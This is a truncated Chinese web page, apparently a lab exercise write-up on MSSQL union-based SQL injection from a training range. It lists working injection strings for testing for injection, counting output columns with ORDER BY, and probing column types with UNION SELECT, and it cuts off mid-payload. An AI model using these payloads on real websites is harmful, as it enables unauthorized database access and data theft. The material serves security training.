封神臺MSSQL注入 - 反彈注入

一、作業 MSSQL注入 - 反彈注入 (Rank: 5) 判斷頁面是否存在注入:’ and 1=2 – qwe.頁面不正常 判斷輸出位個數:‘ order by 3 — qwe,3個輸出位. 輸出位輸出: 錯誤原因:MSSQL對輸出位數據很嚴格.應該: ‘ union select 5,null,null — qwe 正常,說明第一個輸出字段爲整數. ‘union select 5,’a’,’a
相關文章
相關標籤/搜索